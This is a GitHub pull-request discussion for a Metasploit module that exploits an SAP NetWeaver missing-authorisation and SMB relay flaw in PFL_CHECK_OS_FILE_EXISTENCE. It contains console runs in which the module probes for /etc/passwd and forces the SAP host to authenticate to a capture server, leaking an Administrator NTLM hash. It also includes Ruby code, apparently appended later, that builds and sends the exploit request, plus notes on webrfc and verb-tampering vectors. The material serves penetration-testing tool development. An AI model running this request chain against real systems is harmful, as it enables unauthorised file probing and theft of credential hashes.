PFL_CHECK_OS_FILE_EXISTENCE (file existence and SMB relay) #1658

Merged
merged 1 commit into rapid7:master from nmonkee:sap_soap_rfc_pfl_check_os_file_existence_smb_relay on May 3, 2013

Contributor

nmonkee commented Mar 25, 2013

This module exploits the SAP NetWeaver PFL_CHECK_OS_FILE_EXISTENCE Missing Authorisation Check and SMB Relay Vulnerability. It can be exploited remotely using RFC or webrfc without any additional authorisation by the user. Additionally it can be exploited via transaction SE37.

SAP Note 1591146 / DSECRG-12-009.

ref: http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework May 2, 2013

Merged

Clean up for sap_soap_rfc_pfl_check_os_file_existence #6

Contributor

jvazquez-r7 commented May 2, 2013

Hi @nmonkee,

In nmonkee#6 I'm trying to clean up this pull request. Please feel free to review, discuss, test, etc. any of the changes proposed. Once you feel comfortable, just land the pull request in your repository and this one will be automatically updated. And we'll be ready to merge it.

Also, you might want to check our docs on landing pull requests, https://github.com/rapid7/metasploit-framework/wiki/Landing-Pull-Requests , and it would be nice if you take into account the benefits of clean, short, informative merge commit messages: git merge --no-ff --edit and sticking to the usual 50/72 formatting for commits makes for pleasantly readable logs.

Don't hesitate to ask about any doubts, and also, if while we work on these modules you feel comfortable enough and have the time to incorporate these recommendations into the existing SAP pull requests, that would accelerate things for sure :-) Anyway, I'll keep helping with these pull requests!

Summary of Changes:

  • Keep module filenames shorter.
  • Run tools/msftidy.rb; modules must be compliant.
  • Use the guidelines proposed on https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient when using HTTPClient.
  • Since it's a Scanner module, in order to avoid verbosity, try to use print only for the minimum information possible (normally success). For the other prints use the verbose print => vprint_*
  • Please add the name of the vulnerability discoverer to the Authors section when available; it helps to document modules.
  • Please add known references such as OSVDB, BID or CVE to the References section when available; it helps to document modules.
  • When there are required options, always make things easier by providing a default option if possible.
  • Parsing useful information, in this case the dir enumeration from the XML response, helps to present the results better. Even when storing the loot, it is a good thing to store the full response. Even when, in this Scanner module, the parsed results are only shown to the user when VERBOSE = true.

Thanks!

Contributor

jvazquez-r7 commented May 2, 2013

Testing after changes:

  • File exists:
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set FILEPATH /etc/passwd
    FILEPATH => /etc/passwd
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run

    [*] 192.168.172.179:8042 - Sending request to check /etc/passwd
    [+] 192.168.172.179:8042 - File /etc/passwd exists
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

  • File doesn't exist:
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run

    [*] 192.168.172.179:8042 - Sending request to check /tmasdfp
    [!] 192.168.172.179:8042 - File /tmasdfp DOESN'T exist
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Contributor

jvazquez-r7 commented May 2, 2013

Also, just a question: the original advisory at http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/ speaks about "authentication bypass" (maybe via verb tampering?). It isn't available in this module, is it? As far as I've tested, you need to provide the SAP credentials to execute the abused function. Please let me know if I'm missing something and authentication bypass is provided.

Contributor

nmonkee commented May 3, 2013

  • Windows
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > use auxiliary/server/capture/smb
    msf auxiliary(smb) > set SRVHOST 10.0.7.13
    SRVHOST => 10.0.7.13
    msf auxiliary(smb) > run -j
    [*] Auxiliary module running as background job
    [*] Server started.
    msf > use auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RHOSTS 10.0.7.8
    RHOSTS => 10.0.7.8
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RPORT 8000
    RPORT => 8000
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set FILEPATH \\10.0.7.13\share
    FILEPATH => \\10.0.7.13\share
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run
    [*] SMB Captured - 2013-05-03 08:58:32 +0100
    NTLMv1 Response Captured from 10.0.7.8:50192 - 10.0.7.8
    USER:Administrator DOMAIN:GATEWAY OS: LM:
    LMHASH:Disabled
    NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
    [!] 10.0.7.8:8000 - File \\10.0.7.13\share DOESN'T exist
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

  • Linux
    msf > use auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RHOSTS 10.0.7.50
    RHOSTS => 10.0.7.50
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set RPORT 8042
    RPORT => 8042
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > set FILEPATH /foo
    FILEPATH => /foo
    msf auxiliary(sap_soap_rfc_pfl_check_os_file_existence) > run
    [!] 10.0.7.50:8042 - File /foo DOESN'T exist
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    
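The request that the test transcripts above exercise, together with the SMB relay trigger seen in the Windows run, as an added example in plain Ruby. This is not the Metasploit module's code and not ERPScan's: it builds the SOAP/RFC envelope for PFL_CHECK_OS_FILE_EXISTENCE, classifies the response, and flags a UNC FILEPATH before it is sent. The ICF path /sap/bc/soap/rfc, the SOAPAction value, the importing parameters FULLY_QUALIFIED_FILENAME and LONG_FILENAME, and the exporting flag FILE_EXISTS are assumptions drawn from the function module's interface convention rather than from this page (check them in SE37); the sample responses are constructed, not captured.

```ruby
# Added example (not the Metasploit module's own code): build the SOAP/RFC call
# to PFL_CHECK_OS_FILE_EXISTENCE, interpret the response, and flag FILEPATH
# values that force the SAP host to authenticate outbound over SMB.
# Assumed (verify in SE37 on your system): the importing parameters
# FULLY_QUALIFIED_FILENAME / LONG_FILENAME and the exporting flag FILE_EXISTS.
require 'net/http'
require 'uri'
require 'rexml/document'

SOAP_RFC_PATH = '/sap/bc/soap/rfc'                 # ICF SOAP RFC handler (assumed)
RFC_NS        = 'urn:sap-com:document:sap:rfc:functions'

# Escape the operator-supplied path before it goes into the XML body.
def xml_escape(s)
  s.gsub('&', '&amp;').gsub('<', '&lt;').gsub('>', '&gt;')
end

# SOAP envelope for the function call (assumed parameter names, see above).
def build_request(filepath)
  p = xml_escape(filepath)
  <<~XML
    <?xml version="1.0" encoding="utf-8"?>
    <env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/">
      <env:Body>
        <n1:PFL_CHECK_OS_FILE_EXISTENCE xmlns:n1="#{RFC_NS}">
          <FULLY_QUALIFIED_FILENAME>#{p}</FULLY_QUALIFIED_FILENAME>
          <LONG_FILENAME>#{p}</LONG_FILENAME>
        </n1:PFL_CHECK_OS_FILE_EXISTENCE>
      </env:Body>
    </env:Envelope>
  XML
end

# First element with the given local name, ignoring namespace prefixes.
def find_local(doc, name)
  REXML::XPath.each(doc, '//*') { |e| return e if e.name == name }
  nil
end

# :exists / :missing from the ABAP flag ('X' = true, '' = false), :fault for
# a SOAP Fault (typically authorisation or ICF errors), :unknown otherwise.
def parse_response(body)
  doc = REXML::Document.new(body)
  return :fault if find_local(doc, 'Fault')
  flag = find_local(doc, 'FILE_EXISTS')
  return :unknown unless flag
  flag.text.to_s.strip == 'X' ? :exists : :missing
rescue REXML::ParseException
  :unknown
end

# A UNC path (\\host\share or //host/share) is resolved by the SAP work process
# itself, so the host authenticates to 'host' with the account the process runs
# as, whatever the function afterwards reports about the file.
def unc_path?(filepath)
  filepath.start_with?('\\\\') || filepath.start_with?('//')
end

# Live call (not exercised offline). Credentials are an ordinary dialog user;
# port and client follow the transcripts above.
def check_file(host, port, client, user, pass, filepath, ssl: false)
  uri = URI::HTTP.build(host: host, port: port, path: SOAP_RFC_PATH,
                        query: URI.encode_www_form('sap-client' => client,
                                                   'sap-language' => 'EN'))
  req = Net::HTTP::Post.new(uri)
  req.basic_auth(user, pass)
  req['Content-Type'] = 'text/xml; charset=UTF-8'
  req['SOAPAction']   = RFC_NS                     # assumed header value
  req.body = build_request(filepath)
  res = Net::HTTP.start(uri.host, uri.port, use_ssl: ssl) { |h| h.request(req) }
  [res.code.to_i, parse_response(res.body)]
end

# Constructed sample responses (not captured from a real system).
SAMPLE_EXISTS = <<~XML
  <?xml version="1.0"?>
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
      <n1:PFL_CHECK_OS_FILE_EXISTENCE.Response xmlns:n1="#{RFC_NS}">
        <FILE_EXISTS>X</FILE_EXISTS>
      </n1:PFL_CHECK_OS_FILE_EXISTENCE.Response>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XML
SAMPLE_MISSING = SAMPLE_EXISTS.sub('<FILE_EXISTS>X</FILE_EXISTS>', '<FILE_EXISTS></FILE_EXISTS>')
SAMPLE_FAULT = <<~XML
  <?xml version="1.0"?>
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
      <SOAP-ENV:Fault>
        <faultcode>SOAP-ENV:Client</faultcode>
        <faultstring>Not authorized (constructed sample)</faultstring>
      </SOAP-ENV:Fault>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XML

if __FILE__ == $PROGRAM_NAME
  ['/etc/passwd', '\\\\10.0.7.13\\share'].each do |fp|
    warn "#{fp}: UNC path, target will authenticate to the share host over SMB" if unc_path?(fp)
    puts build_request(fp)
  end
  { exists: SAMPLE_EXISTS, missing: SAMPLE_MISSING, fault: SAMPLE_FAULT }.each do |k, v|
    puts "#{k}: #{parse_response(v)}"
  end
end
```

The capture in the Windows run above shows why the reported result is irrelevant to the relay: the NTLMv1 response arrives before the module prints DOESN'T exist, because the work process authenticates to the share host while resolving the path and only then reports on the (non-existent) file. Any host the SAP server can reach on TCP/445 can be made to receive that authentication, so a FILEPATH of the form \\host\share deserves the same attention as the exists/missing answer, and the ABAP-side fix in SAP Note 1591146 (the authorisation check) is what removes the primitive, not the file check itself.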
Contributor

nmonkee commented May 3, 2013

To answer your question with regards to authentication bypass and verb tampering. Typically verb tampering bypasses are possible against the J2EE engine by using HEAD requests, which is fine for GET requests where parameters are passed in the URI, but as this is a POST SOAP request and is not against the J2EE engine - I think this is a red herring - could be wrong - it's happened before :D

I think this more than likely just refers to an authenticated low priv user being able to execute the RFC without the appropriate authorisations. However, webrfc is also mentioned, which is another connector.

http(s)://<your system>:<your port>/sap/bc/webrfc?_FUNCTION=<RFC FUNCTION NAME>

Calling from this interface allows for the specification of parameters in the URI, and as such could be issued as a HEAD request to facilitate a verb tampering attack.

This RFC is not published by default for Internet access via this connector:

R/3 system message
Function module is not released for the Internet
Diagnosis
You have tried to start the function module from the Internet/Intranet. This is not possible because the function module has not yet been released.
Procedure
For security reasons, you cannot start function modules in the Internet that have not yet been released. The function module must have been explicity released before it can be called from the Internet. To run reports from the Internet, the modules WWW_GET_REPORT and WWW_GET_SELSCREEN must have been released.
Merge pull request #6 from jvazquez-r7/sap_soap_rfc_pfl_check_os_file_existence

Clean up for sap_soap_rfc_pfl_check_os_file_existence
Contributor

jvazquez-r7 commented May 3, 2013

thanks, merging!

@jvazquez-r7 jvazquez-r7 merged commit d8bbd9d into rapid7:master May 3, 2013

1 check passed: the Travis build passed.

@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_pfl_check_os_file_existence_smb_relay branch May 9, 2013
